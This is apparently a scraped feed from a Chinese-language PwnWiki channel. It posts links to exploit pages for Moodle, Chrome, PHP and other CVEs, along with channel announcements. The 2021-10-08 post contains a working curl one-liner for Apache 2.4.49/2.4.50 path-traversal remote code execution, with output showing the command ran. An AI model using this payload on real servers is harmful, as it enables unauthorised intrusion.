Pwnwiki_Zhchannel

Posts

Date Content Media
2021-10-13 01:57:31
CVE-2020-14321 Moodle Teacher Enrollment Privilege Escalation / Remote Code Executionhttps://www.pwnwiki.org/index.php?title=CVE-2020-14321_Moodle_Teacher_Enrollment_Privilege_Escalation_/_Remote_Code_Execution
2021-10-13 01:56:23
CVE-2021-21809 Moodle SpellChecker Path Authenticated Remote Command Executionhttps://www.pwnwiki.org/index.php?title=CVE-2021-21809_Moodle_SpellChecker_Path_Authenticated_Remote_Command_Execution
2021-10-13 01:53:40
Cypress Solutions CTM-200/CTM-ONE Hard-Coded Credentials Remote Roothttps://www.pwnwiki.org/index.php?title=Cypress_Solutions_CTM-200/CTM-ONE_Hard-Coded_Credentials_Remote_Root
2021-10-13 01:52:05
CVE-2019-11631 Moodle Admin Shell Uploadhttps://www.pwnwiki.org/index.php?title=CVE-2019-11631_Moodle_Admin_Shell_Upload
2021-10-13 01:52:02
PwnWiki中文頻道 pinned «Twitter已經恢復正常。 https://twitter.com/pwnwikiorg»
2021-10-13 01:48:41
Twitter已經恢復正常。https://twitter.com/pwnwikiorg
2021-10-13 01:43:56
CVE-2021-37980 Chrome Inappropriate implementation in Sandbox(Windows Only) POChttps://github.com/ZeusBox/CVE-2021-37980
2021-10-11 12:14:01
None Images
2021-10-08 05:01:52
RCE exploit both for Apache 2.4.49 (CVE-2021-41773) and 2.4.50 (CVE-2021-42013):root@CT406:~# curl 'http://192.168.0.191/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo; id'uid=1(daemon) gid=1(daemon) groups=1(daemon)
2021-10-06 13:31:30
PHP 7.0-8.0 disable_functions bypass 0dayhttps://www.pwnwiki.org/index.php?title=PHP_7.0-8.0_disable_functions_bypass_0day
2021-09-30 06:10:45
https://twitter.com/acardia2020/status/1443400100961665026?s=21
2021-09-21 03:49:35
CVE-2021-30632 Microsoft Edge v8內存損壞漏洞https://short.pwnwiki.org/?c=2nj2KW
2021-09-17 03:11:28
CVE-2021-40539 ZOHO ManageEngine ADSelfService Plus 遠程代碼執行漏洞https://short.pwnwiki.org/?c=twKB3M
2021-09-14 06:28:15
RSShttps://www.hack-hub.org/feeds/front/eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOjEsImlzcyI6Im15X2RvbWFpbiIsImlhdCI6MTYzMTYwMDg0OH0.2a5jrTmrDE8-l-TKIE3SDx2JVnnzeJcDtBkmZLjTCGw.xml?sort=Active
2021-09-13 14:46:43
如何設置為中文?進入用戶設置 - 修改語言即可。
2021-09-13 14:41:14
中文板塊已啟用。https://www.hack-hub.org/c/infosec_zh
2021-09-13 14:31:56
www.hack-hub.org 已經啟用。為保護隱私,無需郵箱驗證。
2021-09-13 08:08:27
None
2021-09-06 11:16:22
CVE-2019-10677 DASAN Zhone ZNID GPON 2426A EU Multiple XSS漏洞CVE-2019-1619&CVE-2019-1622 Cisco Data Center Network Manager 遠程代碼執行漏洞CVE-2019-15081 Opencart 3.x XSS漏洞CVE-2019-15814 Sentrifugo 3.2 XSS漏洞CVE-2011-2921 ktsuss 1.4 suid 權限提升漏洞CVE-2019-16197 Dolibarr ERP-CRM 10.0.1 XSS漏洞CVE-2019-16119 WordPress Plugin Photo Gallery 1.5.34 SQL注入漏洞CVE-2019-16068 Enigma NMS 65.0.0 CSRF漏洞CVE-2019-16065 Enigma NMS 65.0.0 SQL注入漏洞CVE-2015-5287 ABRT sosreport 本地權限提升漏洞CVE-2019-16701 pfSense 2.3.4&2.4.4-p3 遠程代碼注入漏洞CVE-2019-16679 Gila CMS 本地文件包含漏洞CVE-2019-17080 mintinstall 7.9.9 代碼執行漏洞CVE-2019-12562 DotNetNuke XSS漏洞CVE-2015-5287 ABRT sosreport 權限提升漏洞CVE-2019-5485 NPMJS gitlabhook 0.0.17 遠程代碼執行漏洞CVE-2019-17132 vBulletin 5.5.4 遠程代碼執行漏洞CVE-2019-17271 vBulletin 5.5.4 SQL注入漏洞CVE-2019-17225 Subrion 4.2.1 XSS漏洞CVE-2019-15741 GitLab Omnibus 12.2.1 Logrotate 權限提升漏洞Garuda Media SQL注入漏洞BelajarBro SQL注入漏洞CVE-2019-13529 SMA Solar Technology AG Sunny WebBox 1.6 CSRF漏洞CVE-2019-6971 TP-Link TL-WR1043ND 2 身份驗證繞過漏洞
2021-09-05 02:47:53
我們現在空閒該域名: hack-hub.org 大家希望做成什麼內容?歡迎討論